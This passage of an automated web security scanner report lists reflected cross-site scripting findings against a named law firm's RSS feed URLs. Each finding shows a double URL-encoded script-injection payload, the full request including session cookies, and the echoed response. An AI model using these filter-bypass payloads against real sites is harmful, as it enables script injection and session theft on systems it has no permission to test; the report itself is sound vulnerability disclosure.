2.132. http://www.wileyrein.com/rss/practices/Advertising/rss.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Advertising/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80e2b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e09ca10697f5 was submitted in the REST URL parameter 3. This input was echoed as 80e2b"><script>alert(1)</script>09ca10697f5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Advertising80e2b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e09ca10697f5/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Advertising80e2b"><script>alert(1)</script>09ca10697f5/rss.xml" value="">
...[SNIP]...

2.133. http://www.wileyrein.com/rss/practices/Advertising/rss.xml [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Advertising/rss.xml

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86ab1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6017d2c2dff was submitted in the REST URL parameter 4. This input was echoed as 86ab1"><script>alert(1)</script>6017d2c2dff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Advertising/rss.xml86ab1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6017d2c2dff HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Advertising/rss.xml86ab1"><script>alert(1)</script>6017d2c2dff" value="">
...[SNIP]...

2.134. http://www.wileyrein.com/rss/practices/Antitrust/rss.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Antitrust/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 164d9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7c58cabc2d0 was submitted in the REST URL parameter 1. This input was echoed as 164d9"><script>alert(1)</script>7c58cabc2d0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss164d9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7c58cabc2d0/practices/Antitrust/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss164d9"><script>alert(1)</script>7c58cabc2d0/practices/Antitrust/rss.xml" value="">
...[SNIP]...

2.135. http://www.wileyrein.com/rss/practices/Antitrust/rss.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Antitrust/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9acfd%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e287c030088b was submitted in the REST URL parameter 2. This input was echoed as 9acfd"><script>alert(1)</script>287c030088b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices9acfd%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e287c030088b/Antitrust/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices9acfd"><script>alert(1)</script>287c030088b/Antitrust/rss.xml" value="">
...[SNIP]...

2.136. http://www.wileyrein.com/rss/practices/Antitrust/rss.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Antitrust/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd079%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebf831efe7af was submitted in the REST URL parameter 3. This input was echoed as bd079"><script>alert(1)</script>bf831efe7af in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Antitrustbd079%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebf831efe7af/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Antitrustbd079"><script>alert(1)</script>bf831efe7af/rss.xml" value="">
...[SNIP]...

2.137. http://www.wileyrein.com/rss/practices/Antitrust/rss.xml [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Antitrust/rss.xml

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10885%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9f493b0ddcb was submitted in the REST URL parameter 4. This input was echoed as 10885"><script>alert(1)</script>9f493b0ddcb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Antitrust/rss.xml10885%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9f493b0ddcb HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Antitrust/rss.xml10885"><script>alert(1)</script>9f493b0ddcb" value="">
...[SNIP]...

2.138. http://www.wileyrein.com/rss/practices/Appellate/rss.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Appellate/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b382%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed866589a601 was submitted in the REST URL parameter 1. This input was echoed as 4b382"><script>alert(1)</script>d866589a601 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss4b382%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed866589a601/practices/Appellate/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss4b382"><script>alert(1)</script>d866589a601/practices/Appellate/rss.xml" value="">
...[SNIP]...

2.139. http://www.wileyrein.com/rss/practices/Appellate/rss.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Appellate/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83f09%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9da8d699e40 was submitted in the REST URL parameter 2. This input was echoed as 83f09"><script>alert(1)</script>9da8d699e40 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices83f09%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9da8d699e40/Appellate/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices83f09"><script>alert(1)</script>9da8d699e40/Appellate/rss.xml" value="">
...[SNIP]...

2.140. http://www.wileyrein.com/rss/practices/Appellate/rss.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Appellate/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3566d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e021d1023e4a was submitted in the REST URL parameter 3. This input was echoed as 3566d"><script>alert(1)</script>021d1023e4a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Appellate3566d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e021d1023e4a/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Appellate3566d"><script>alert(1)</script>021d1023e4a/rss.xml" value="">
...[SNIP]...

2.141. http://www.wileyrein.com/rss/practices/Appellate/rss.xml [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Appellate/rss.xml

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c988%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e407b643948c was submitted in the REST URL parameter 4. This input was echoed as 2c988"><script>alert(1)</script>407b643948c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Appellate/rss.xml2c988%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e407b643948c HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Appellate/rss.xml2c988"><script>alert(1)</script>407b643948c" value="">
...[SNIP]...

2.142. http://www.wileyrein.com/rss/practices/Aviation/rss.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Aviation/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2da3e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e93729e4d7b0 was submitted in the REST URL parameter 1. This input was echoed as 2da3e"><script>alert(1)</script>93729e4d7b0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss2da3e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e93729e4d7b0/practices/Aviation/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss2da3e"><script>alert(1)</script>93729e4d7b0/practices/Aviation/rss.xml" value="">
...[SNIP]...

2.143. http://www.wileyrein.com/rss/practices/Aviation/rss.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Aviation/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed7d3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edd1cc3a52a5 was submitted in the REST URL parameter 2. This input was echoed as ed7d3"><script>alert(1)</script>dd1cc3a52a5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practicesed7d3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edd1cc3a52a5/Aviation/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practicesed7d3"><script>alert(1)</script>dd1cc3a52a5/Aviation/rss.xml" value="">
...[SNIP]...

2.144. http://www.wileyrein.com/rss/practices/Aviation/rss.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Aviation/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5cb1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7ae874bc296 was submitted in the REST URL parameter 3. This input was echoed as d5cb1"><script>alert(1)</script>7ae874bc296 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Aviationd5cb1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7ae874bc296/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Aviationd5cb1"><script>alert(1)</script>7ae874bc296/rss.xml" value="">
...[SNIP]...

2.145. http://www.wileyrein.com/rss/practices/Aviation/rss.xml [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Aviation/rss.xml

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f5ee%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e49810451264 was submitted in the REST URL parameter 4. This input was echoed as 2f5ee"><script>alert(1)</script>49810451264 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Aviation/rss.xml2f5ee%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e49810451264 HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Aviation/rss.xml2f5ee"><script>alert(1)</script>49810451264" value="">
...[SNIP]...

2.146. http://www.wileyrein.com/rss/practices/Bankruptcy__Financial_Restructuring/rss.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Bankruptcy__Financial_Restructuring/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e654b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed4d67e0d85e was submitted in the REST URL parameter 1. This input was echoed as e654b"><script>alert(1)</script>d4d67e0d85e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rsse654b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed4d67e0d85e/practices/Bankruptcy__Financial_Restructuring/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
